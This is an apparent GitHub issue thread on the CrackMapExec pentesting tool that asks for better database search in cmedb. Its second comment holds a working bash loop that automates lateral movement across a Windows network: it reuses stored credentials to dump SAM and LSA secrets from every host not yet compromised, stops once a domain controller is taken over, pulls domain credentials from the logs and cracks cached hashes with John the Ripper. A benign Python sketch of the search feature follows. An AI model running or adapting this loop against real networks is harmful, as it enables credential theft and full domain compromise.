byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License

cmedb improvement #451

Closed s0i37 closed 3 years ago

s0i37 commented 3 years ago

Hello. I want to suggest a small improvement to the current cmedb capabilities. Currently hosts can only be searched by IP and hostname. Maybe it should also search the other available columns?

cmedb> hosts some_domain
cmedb> hosts Windows 6.1

And the same for creds:

cmedb> creds some_domain
cmedb> creds aad3b435b51404eeaad3b435b51404ee

Also, it would be very nice if we could use cmedb and cme together to automatically cover all credentials against all available hosts. I expected something like this:

for cred in $(cmedb "creds" --output=CredID)
do
 cme smb -id $cred --sam <(comm -23 targets.txt <(cmedb "hosts" --output=IP))
done

Hence cmedb should also read commands via arguments, like cmedb "workspace company_x; hosts 10.0.0; hosts 11.0.0". I suppose all of these things could be implemented very easily :)

s0i37 commented 3 years ago

Ok. Currently I can implement lateral movement automation like this:

db=~/.cme/workspaces/default/smb.db
sort -o targets.txt targets.txt   # comm(1) needs sorted input, so sort in place rather than to stdout
cme smb -d . -u admin -p password --shares 10.0.0.10  #initial creds (the script assumes they land in the db as id 1)
# hosts on which some credential already in the db has admin rights (cme records these in admin_relations)
pwned() { sqlite3 "$db" "select c.ip from computers as c, users as u, admin_relations as r where r.userid=u.id and r.computerid=c.id" | sort -u; }
id=1
while :
do
  # dump SAM and LSA secrets with credential $id on every target not yet pwned; newly found creds get higher ids
  cme smb -id $id --sam <(comm -23 targets.txt <(pwned))
  cme smb -id $id --lsa <(comm -23 targets.txt <(pwned))
  # drop the built-in accounts that every SAM dump adds to the db
  sqlite3 "$db" "delete from users where username='Guest'"
  sqlite3 "$db" "delete from users where username='DefaultAccount'"
  # stop as soon as a credential is admin on a domain controller
  cme smb -id $id --shares dc.txt 2>&1 | grep Pwn3d && break
  ((id++))
  # also stop when the stored credentials are exhausted, instead of looping forever
  [ "$id" -le "$(sqlite3 "$db" "select coalesce(max(id),0) from users")" ] || break
done
grep -r @ ~/.cme/logs; fgrep -ar '\' ~/.cme/logs | fgrep -v '$:'   # domain creds found in the logs, skipping machine accounts
john --format=mscash2 <(sort -u ~/.cme/logs/*.cached)
john --format=mscash2 <(sort -u ~/.cme/logs/*.cached) --show

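
The two features requested in this thread, searching every column of hosts and creds and running cmedb commands from a string, plus the "targets minus already-pwned hosts" step of the loop above, as an added example in Python against the cme smb.db. This is illustration code written for this page, not cmedb's or CrackMapExec's own implementation. The table layout (computers, users, admin_relations) is assumed from the SQL query quoted in the thread, the rows are constructed, and the LM:NT hash is the well-known empty-password pair; the `workspace` command is not handled.

```python
import sqlite3

# Assumed layout of the cme smb.db at the time, reconstructed from the query in
# the thread (computers / users / admin_relations); not copied from the project.
SCHEMA = """
create table computers (id integer primary key, ip text, hostname text,
                        domain text, os text, dc boolean);
create table users (id integer primary key, domain text, username text,
                    password text, credtype text, pillaged_from_computerid integer);
create table admin_relations (id integer primary key, userid integer, computerid integer);
"""

# Constructed sample rows (not from a real engagement). EMPTY_LMNT is the
# well-known LM:NT hash pair of an empty password.
EMPTY_LMNT = "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
COMPUTERS = [
    (1, "10.0.0.10", "WS01", "CORP", "Windows 6.1 Build 7601", 0),
    (2, "10.0.0.11", "WS02", "CORP", "Windows 10.0 Build 19041", 0),
    (3, "10.0.0.20", "DC01", "CORP", "Windows 10.0 Build 17763", 1),
]
USERS = [
    (1, "CORP", "admin", "password", "plaintext", None),
    (2, "WS01", "Administrator", EMPTY_LMNT, "hash", 1),
]
ADMIN_RELATIONS = [(1, 1, 1)]  # credential 1 is admin on WS01 only

TABLES = {"hosts": "computers", "creds": "users"}  # cmedb command -> table


def open_db(path=":memory:"):
    """Create and populate a database with the assumed schema and sample rows."""
    conn = sqlite3.connect(path)
    conn.executescript(SCHEMA)
    conn.executemany("insert into computers values (?,?,?,?,?,?)", COMPUTERS)
    conn.executemany("insert into users values (?,?,?,?,?,?)", USERS)
    conn.executemany("insert into admin_relations values (?,?,?)", ADMIN_RELATIONS)
    conn.commit()
    return conn


def search(conn, what, needle):
    """Substring search over every column of hosts or creds, not only ip/hostname.

    Column names come from PRAGMA table_info (trusted); the needle is bound as a
    parameter, so user input never becomes part of the SQL text. LIKE is
    case-insensitive for ASCII, so 'corp' also matches 'CORP'."""
    table = TABLES[what]
    cols = [row[1] for row in conn.execute(f"pragma table_info({table})")]
    where = " or ".join(f"{c} like ?" for c in cols)
    pattern = f"%{needle}%"
    rows = conn.execute(f"select id from {table} where {where} order by id",
                        [pattern] * len(cols)).fetchall()
    return [r[0] for r in rows]


def admin_ips(conn):
    """IPs where at least one stored credential already has admin rights."""
    rows = conn.execute(
        "select distinct c.ip from computers c join admin_relations r "
        "on r.computerid = c.id").fetchall()
    return sorted(r[0] for r in rows)


def uncovered(conn, targets):
    """Targets with no admin credential yet: the comm -23 step of the shell loop."""
    return sorted(set(targets) - set(admin_ips(conn)))


def run_batch(conn, commands):
    """Run a 'hosts X; creds Y' command string, as one would pass it on the cmedb
    command line. Returns a list of (command, matching ids)."""
    out = []
    for cmd in commands.split(";"):
        cmd = cmd.strip()
        if not cmd:
            continue
        what, _, needle = cmd.partition(" ")
        if what not in TABLES:
            raise ValueError(f"unknown command: {what}")
        out.append((cmd, search(conn, what, needle.strip())))
    return out


if __name__ == "__main__":
    db = open_db()
    print(run_batch(db, "hosts Windows 6.1; creds aad3b435b51404eeaad3b435b51404ee"))
    print(uncovered(db, ["10.0.0.10", "10.0.0.11", "10.0.0.20", "10.0.0.30"]))
```

The column list is read from the database itself, so a new column in hosts or creds becomes searchable without touching the query; the shell one-liners in the thread instead splice values straight into the SQL string, which is fine for a personal workspace file but is the habit to avoid once the input comes from a command line.
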
s0i37 commented 3 years ago

It seems that cme doesn't handle piped input appropriately.

Fix crackmapexec.py:

target_file_type = '' #identify_target_file(target)